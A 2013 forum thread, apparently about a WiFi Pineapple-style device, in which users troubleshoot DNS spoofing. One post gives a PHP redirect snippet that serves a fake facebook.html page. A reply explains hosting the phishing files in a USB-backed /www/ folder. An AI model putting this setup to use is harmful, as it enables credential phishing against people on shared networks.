deviney Posted April 26, 2013 Share Posted April 26, 2013 i have updated my firmware to 2.8 and since then i cant use DNS Spoof. I have setup all the config on the web interface and changed the redirect.php file to the one below. <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "facebook")){ header('Status: 302 Found'); header('Location: facebook.html'); } require('facebook.html');?> in my opinion this should display the facebook.html page no matter what but i am just getting timeout errors. am i going wrong somewhere??? Quote Link to comment Share on other sites More sharing options...
WallE Posted April 26, 2013 Share Posted April 26, 2013 (edited) Did you put the correct html file in the /www/ folder with winSCP? I am actually working on that so if you need help just tell me. You gonna need the correct html file and the correct php file. You have to put them on the /www/ folder through winSCP. But you will not have enough memory so you have to swap a USB dongle. And redirect one of your USB folder to the /www/ folder. Use that command -ln -s /usb/phish/* /www/ btw I used /phish because that's the name of the folder I created you can make anything you want. Edited April 26, 2013 by WallE Quote Link to comment Share on other sites More sharing options...
deviney Posted April 26, 2013 Author Share Posted April 26, 2013 sorry i should posted that its fixed. I have no idea why tho... i came home after a presentation and went to investigate further but for some reason it worked first time :/ Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.